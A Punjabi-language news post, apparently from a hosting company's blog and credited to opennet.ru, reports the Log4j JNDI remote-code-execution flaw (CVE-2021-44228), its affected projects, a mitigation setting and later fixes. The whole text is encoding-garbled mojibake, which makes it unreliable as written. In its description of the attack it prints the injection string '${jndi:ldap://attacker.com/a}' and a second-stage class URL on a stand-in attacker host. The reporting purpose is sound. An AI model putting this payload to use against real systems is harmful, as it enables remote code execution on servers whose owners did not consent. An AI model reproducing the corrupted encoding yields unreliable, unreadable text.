เจชเฉเจฐเฉ‹เจนเฉ‹เจธเจŸเจฐ > ะ‘ะปะพะณ > เจ‡เฉฐเจŸเจฐเจจเฉˆเฉฑเจŸ เจ–เจฌเจฐ > Apache Log4j เจตเจฟเฉฑเจš เจ˜เจพเจคเจ• เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจฌเจนเฉเจค เจธเจพเจฐเฉ‡ Java เจชเฉเจฐเฉ‹เจœเฉˆเจ•เจŸเจพเจ‚ เจจเฉ‚เฉฐ เจชเฉเจฐเจญเจพเจตเจฟเจค เจ•เจฐเจฆเฉ€ เจนเฉˆ

Apache Log4j เจตเจฟเฉฑเจš เจ˜เจพเจคเจ• เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจฌเจนเฉเจค เจธเจพเจฐเฉ‡ Java เจชเฉเจฐเฉ‹เจœเฉˆเจ•เจŸเจพเจ‚ เจจเฉ‚เฉฐ เจชเฉเจฐเจญเจพเจตเจฟเจค เจ•เจฐเจฆเฉ€ เจนเฉˆ

Apache Log4j, Java เจเจชเจฒเฉ€เจ•เฉ‡เจธเจผเจจเจพเจ‚ เจตเจฟเฉฑเจš เจฒเฉŒเจ—เจฟเฉฐเจ— เจจเฉ‚เฉฐ เจธเฉฐเจ—เจ เจฟเจค เจ•เจฐเจจ เจฒเจˆ เจ‡เฉฑเจ• เจชเฉเจฐเจธเจฟเฉฑเจง เจซเจฐเฉ‡เจฎเจตเจฐเจ• เจตเจฟเฉฑเจš, เจ‡เฉฑเจ• เจจเจพเจœเจผเฉเจ• เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจฆเฉ€ เจชเจ›เจพเจฃ เจ•เฉ€เจคเฉ€ เจ—เจˆ เจนเฉˆ เจœเฉ‹ เจฒเฉŒเจ— เจตเจฟเฉฑเจš โ€œ{jndi:URL}โ€ เจซเจพเจฐเจฎเฉˆเจŸ เจตเจฟเฉฑเจš เจตเจฟเจธเจผเฉ‡เจธเจผ เจฐเฉ‚เจช เจตเจฟเฉฑเจš เจซเจพเจฐเจฎเฉˆเจŸ เจ•เฉ€เจคเฉ‡ เจฎเฉเฉฑเจฒ เจจเฉ‚เฉฐ เจฒเจฟเจ–เฉ‡ เจœเจพเจฃ 'เจคเฉ‡ เจ†เจฐเจฌเจฟเจŸเจฐเจฐเฉ€ เจ•เฉ‹เจก เจจเฉ‚เฉฐ เจฒเจพเจ—เฉ‚ เจ•เจฐเจจ เจฆเฉ€ เจ‡เจœเจพเจœเจผเจค เจฆเจฟเฉฐเจฆเจพ เจนเฉˆเฅค เจนเจฎเจฒเจพ เจœเจพเจตเจพ เจเจชเจฒเฉ€เจ•เฉ‡เจธเจผเจจเจพเจ‚ 'เจคเฉ‡ เจ•เฉ€เจคเจพ เจœเจพ เจธเจ•เจฆเจพ เจนเฉˆ เจœเฉ‹ เจฌเจพเจนเจฐเฉ€ เจธเจฐเฉ‹เจคเจพเจ‚ เจคเฉ‹เจ‚ เจชเฉเจฐเจพเจชเจค เจฎเฉเฉฑเจฒเจพเจ‚ เจจเฉ‚เฉฐ เจฒเฉŒเจ— เจ•เจฐเจฆเฉ‡ เจนเจจ, เจ‰เจฆเจพเจนเจฐเจจ เจฒเจˆ, เจ—เจฒเจคเฉ€ เจธเฉเจจเฉ‡เจนเจฟเจ†เจ‚ เจตเจฟเฉฑเจš เจธเจฎเฉฑเจธเจฟเจ† เจตเจพเจฒเฉ‡ เจฎเฉเฉฑเจฒเจพเจ‚ เจจเฉ‚เฉฐ เจชเฉเจฐเจฆเจฐเจธเจผเจฟเจค เจ•เจฐเจฆเฉ‡ เจธเจฎเฉ‡เจ‚เฅค

เจ‡เจน เจจเฉ‹เจŸ เจ•เฉ€เจคเจพ เจ—เจฟเจ† เจนเฉˆ เจ•เจฟ เจ…เจชเจพเจšเฉ‡ เจธเจŸเฉเจฐเจŸเจธ, เจ…เจชเจพเจšเฉ‡ เจธเฉ‹เจฒเจฐ, เจ…เจชเจพเจšเฉ‡ เจกเจฐเฉ‚เจ‡เจก เจœเจพเจ‚ เจ…เจชเจพเจšเฉ‡ เจซเจฒเจฟเฉฐเจ• เจตเจฐเจ—เฉ‡ เจซเจฐเฉ‡เจฎเจตเจฐเจ• เจฆเฉ€ เจตเจฐเจคเฉ‹เจ‚ เจ•เจฐเจจ เจตเจพเจฒเฉ‡ เจฒเจ—เจญเจ— เจธเจพเจฐเฉ‡ เจชเฉเจฐเฉ‹เจœเฉˆเจ•เจŸ เจธเจฎเฉฑเจธเจฟเจ† เจจเจพเจฒ เจชเฉเจฐเจญเจพเจตเจฟเจค เจนเฉเฉฐเจฆเฉ‡ เจนเจจ, เจœเจฟเจธ เจตเจฟเฉฑเจš เจธเจŸเฉ€เจฎ, เจเจชเจฒ เจ†เจˆเจ•เจฒเจพเจ‰เจก, เจฎเจพเจ‡เจจเจ•เจฐเจพเจซเจŸ เจ•เจฒเจพเจ‡เฉฐเจŸเจธ เจ…เจคเฉ‡ เจธเจฐเจตเจฐ เจธเจผเจพเจฎเจฒ เจนเจจเฅค เจ‡เจน เจ‰เจฎเฉ€เจฆ เจ•เฉ€เจคเฉ€ เจœเจพเจ‚เจฆเฉ€ เจนเฉˆ เจ•เจฟ เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจ•เจพเจฐเจชเฉ‹เจฐเฉ‡เจŸ เจเจชเจฒเฉ€เจ•เฉ‡เจธเจผเจจเจพเจ‚ 'เจคเฉ‡ เจตเฉฑเจกเฉ‡ เจนเจฎเจฒเจฟเจ†เจ‚ เจฆเฉ€ เจ‡เฉฑเจ• เจฒเจนเจฟเจฐ เจฆเฉ€ เจ…เจ—เจตเจพเจˆ เจ•เจฐ เจธเจ•เจฆเฉ€ เจนเฉˆ, เจ…เจชเจพเจšเฉ‡ เจธเจŸเฉเจฐเจŸเจธ เจซเจฐเฉ‡เจฎเจตเจฐเจ• เจตเจฟเฉฑเจš เจจเจพเจœเจผเฉเจ• เจ•เจฎเจœเจผเฉ‹เจฐเฉ€เจ†เจ‚ เจฆเฉ‡ เจ‡เจคเจฟเจนเจพเจธ เจจเฉ‚เฉฐ เจฆเฉเจนเจฐเจพเจ‰เจ‚เจฆเฉ‡ เจนเฉ‹เจ, เจœเฉ‹ เจ•เจฟ เจ‡เฉฑเจ• เจฎเฉ‹เจŸเฉ‡ เจ…เฉฐเจฆเจพเจœเจผเฉ‡ เจ…เจจเฉเจธเจพเจฐ, เจตเฉˆเจฌ เจเจชเจฒเฉ€เจ•เฉ‡เจธเจผเจจเจพเจ‚ เจตเจฟเฉฑเจš เจซเจพเจฐเจšเฉ‚เจจ เจฆเฉ‡ 65% เจฆเฉเจ†เจฐเจพ เจตเจฐเจคเฉ€ เจœเจพเจ‚เจฆเฉ€ เจนเฉˆ. 100 เจ•เฉฐเจชเจจเฉ€เจ†เจ‚เฅค เจ•เจฎเจœเจผเฉ‹เจฐ เจธเจฟเจธเจŸเจฎเจพเจ‚ เจฒเจˆ เจจเฉˆเฉฑเจŸเจตเจฐเจ• เจจเฉ‚เฉฐ เจธเจ•เฉˆเจจ เจ•เจฐเจจ เจฆเฉ€เจ†เจ‚ เจ•เฉ‹เจธเจผเจฟเจธเจผเจพเจ‚ เจธเจฎเฉ‡เจคเฅค

เจธเจฎเฉฑเจธเจฟเจ† เจ‡เจธ เจคเฉฑเจฅ เจคเฉ‹เจ‚ เจตเจง เจ—เจˆ เจนเฉˆ เจ•เจฟ เจ‡เฉฑเจ• เจ•เจพเจฐเจœเจธเจผเฉ€เจฒ เจธเจผเฉ‹เจธเจผเจฃ เจชเจนเจฟเจฒเจพเจ‚ เจนเฉ€ เจชเฉเจฐเจ•เจพเจธเจผเจฟเจค เจ•เฉ€เจคเจพ เจœเจพ เจšเฉเฉฑเจ•เจพ เจนเฉˆ, เจชเจฐ เจธเจฅเจฟเจฐ เจธเจผเจพเจ–เจพเจตเจพเจ‚ เจฒเจˆ เจซเจฟเจ•เจธ เจ…เจœเฉ‡ เจตเฉ€ เจธเฉฐเจ•เจฒเจฟเจค เจจเจนเฉ€เจ‚ เจ•เฉ€เจคเฉ‡ เจ—เจ เจนเจจ. CVE เจชเจ›เจพเจฃเจ•เจฐเจคเจพ เจ…เจœเฉ‡ เจคเฉฑเจ• เจจเจฟเจฐเจงเจพเจฐเจค เจจเจนเฉ€เจ‚ เจ•เฉ€เจคเจพ เจ—เจฟเจ† เจนเฉˆเฅค เจซเจฟเจ•เจธ เจธเจฟเจฐเจซ log4j-2.15.0-rc1 เจŸเฉˆเจธเจŸ เจธเจผเจพเจ–เจพ เจตเจฟเฉฑเจš เจธเจผเจพเจฎเจฒ เจนเฉˆเฅค เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจจเฉ‚เฉฐ เจฐเฉ‹เจ•เจฃ เจฒเจˆ เจ‡เฉฑเจ• เจนเฉฑเจฒ เจตเจœเฉ‹เจ‚, log4j2.formatMsgNoLookups เจชเฉˆเจฐเจพเจฎเฉ€เจŸเจฐ เจจเฉ‚เฉฐ เจธเจนเฉ€ 'เจคเฉ‡ เจธเฉˆเฉฑเจŸ เจ•เจฐเจจ เจฆเฉ€ เจธเจฟเจซเจพเจฐเจธเจผ เจ•เฉ€เจคเฉ€ เจœเจพเจ‚เจฆเฉ€ เจนเฉˆเฅค

เจธเจฎเฉฑเจธเจฟเจ† เจ‡เจธ เจคเฉฑเจฅ เจฆเฉ‡ เจ•เจพเจฐเจจ เจนเฉ‹เจˆ เจธเฉ€ เจ•เจฟ log4j เจฒเฉŒเจ— เจฒเจˆ เจฒเจพเจˆเจจ เจ†เจ‰เจŸเจชเฉเฉฑเจŸ เจตเจฟเฉฑเจš เจตเจฟเจธเจผเฉ‡เจธเจผ เจฎเจพเจธเจ• "{}" เจจเฉ‚เฉฐ เจชเฉเจฐเฉ‹เจธเฉˆเจธ เจ•เจฐเจจ เจฆเจพ เจธเจฎเจฐเจฅเจจ เจ•เจฐเจฆเจพ เจนเฉˆ, เจœเจฟเจธ เจตเจฟเฉฑเจš JNDI (เจœเจพเจตเจพ เจจเฉ‡เจฎเจฟเฉฐเจ— เจ…เจคเฉ‡ เจกเจพเจ‡เจฐเฉˆเจ•เจŸเจฐเฉ€ เจ‡เฉฐเจŸเจฐเจซเฉ‡เจธ) เจชเฉเฉฑเจ›เจ—เจฟเฉฑเจ›เจพเจ‚ เจจเฉ‚เฉฐ เจšเจฒเจพเจ‡เจ† เจœเจพ เจธเจ•เจฆเจพ เจนเฉˆเฅค เจนเจฎเจฒเจพ "${jndi:ldap://attacker.com/a}" เจฆเฉ‡ เจฌเจฆเจฒ เจจเจพเจฒ เจ‡เฉฑเจ• เจธเจคเจฐ เจจเฉ‚เฉฐ เจชเจพเจธ เจ•เจฐเจจ เจฒเจˆ เจ‰เจฌเจพเจฒเจฆเจพ เจนเฉˆ, เจœเจฟเจธ เจฆเฉ€ เจชเฉเจฐเจ•เจฟเจฐเจฟเจ† เจ•เจฐเจจ 'เจคเฉ‡ log4j เจนเจฎเจฒเจพเจตเจฐ.com เจธเจฐเจตเจฐ เจจเฉ‚เฉฐ Java เจ•เจฒเจพเจธ เจฆเฉ‡ เจฎเจพเจฐเจ— เจฒเจˆ เจ‡เฉฑเจ• LDAP เจฌเฉ‡เจจเจคเฉ€ เจญเฉ‡เจœเฉ‡เจ—เจพเฅค . เจนเจฎเจฒเจพเจตเจฐ เจฆเฉ‡ เจธเจฐเจตเจฐ เจฆเฉเจ†เจฐเจพ เจตเจพเจชเจธ เจ•เฉ€เจคเจพ เจ—เจฟเจ† เจฎเจพเจฐเจ— (เจ‰เจฆเจพเจนเจฐเจจ เจฒเจˆ, http://second-stage.attacker.com/Exploit.class) เจฎเฉŒเจœเฉ‚เจฆเจพ เจชเฉเจฐเจ•เจฟเจฐเจฟเจ† เจฆเฉ‡ เจธเฉฐเจฆเจฐเจญ เจตเจฟเฉฑเจš เจฒเฉ‹เจก เจ…เจคเฉ‡ เจเจ—เจœเจผเฉ€เจ•เจฟเจŠเจŸ เจ•เฉ€เจคเจพ เจœเจพเจตเฉ‡เจ—เจพ, เจœเฉ‹ เจนเจฎเจฒเจพเจตเจฐ เจจเฉ‚เฉฐ เจ†เจฐเจฌเจฟเจŸเจฐเฉ‡เจฐเฉ€ เจ•เฉ‹เจก เจจเฉ‚เฉฐ เจšเจฒเจพเจ‰เจฃ เจฆเฉ€ เจ‡เจœเจพเจœเจผเจค เจฆเจฟเฉฐเจฆเจพ เจนเฉˆเฅค เจฎเฉŒเจœเฉ‚เจฆเจพ เจเจชเจฒเฉ€เจ•เฉ‡เจธเจผเจจ เจฆเฉ‡ เจ…เจงเจฟเจ•เจพเจฐเจพเจ‚ เจตเจพเจฒเจพ เจธเจฟเจธเจŸเจฎเฅค

เจœเฉ‹เฉœ 1: เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจจเฉ‚เฉฐ เจชเจ›เจพเจฃเจ•เจฐเจคเจพ CVE-2021-44228 เจจเจฟเจฐเจงเจพเจฐเจค เจ•เฉ€เจคเจพ เจ—เจฟเจ† เจนเฉˆเฅค

เจเจกเฉˆเจ‚เจกเจฎ 2: เจฐเฉ€เจฒเฉ€เจœเจผ log4j-2.15.0-rc1 เจฆเฉเจ†เจฐเจพ เจœเฉ‹เฉœเฉ€ เจ—เจˆ เจธเฉเจฐเฉฑเจ–เจฟเจ† เจจเฉ‚เฉฐ เจฌเจพเจˆเจชเจพเจธ เจ•เจฐเจจ เจฆเจพ เจคเจฐเฉ€เจ•เจพ เจชเจ›เจพเจฃเจฟเจ† เจ—เจฟเจ† เจนเฉˆเฅค เจ‡เฉฑเจ• เจจเจตเจพเจ‚ เจ…เจชเจกเฉ‡เจŸ, log4j-2.15.0-rc2, เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจฆเฉ‡ เจตเจฟเจฐเฉเฉฑเจง เจตเจงเฉ‡เจฐเฉ‡ เจธเฉฐเจชเฉ‚เจฐเจจ เจธเฉเจฐเฉฑเจ–เจฟเจ† เจฆเฉ‡ เจจเจพเจฒ เจชเฉเจฐเจธเจคเจพเจตเจฟเจค เจ•เฉ€เจคเจพ เจ—เจฟเจ† เจนเฉˆเฅค เจ•เฉ‹เจก เจ—เจฒเจค เจขเฉฐเจ— เจจเจพเจฒ เจซเจพเจฐเจฎเฉˆเจŸ เจ•เฉ€เจคเฉ‡ JNDI URL เจฆเฉ€ เจตเจฐเจคเฉ‹เจ‚ เจ•เจฐเจจ เจฆเฉ‡ เจฎเจพเจฎเจฒเฉ‡ เจตเจฟเฉฑเจš เจ‡เฉฑเจ• เจ…เจธเจงเจพเจฐเจจ เจธเจฎเจพเจชเจคเฉ€ เจฆเฉ€ เจ…เจฃเจนเฉ‹เจ‚เจฆ เจจเจพเจฒ เจธเฉฐเจฌเฉฐเจงเจฟเจค เจคเจฌเจฆเฉ€เจฒเฉ€ เจจเฉ‚เฉฐ เจ‰เจœเจพเจ—เจฐ เจ•เจฐเจฆเจพ เจนเฉˆเฅค

เจธเจฐเฉ‹เจค: opennet.ru

เจ‡เฉฑเจ• เจŸเจฟเฉฑเจชเจฃเฉ€ เจœเฉ‹เฉœเฉ‹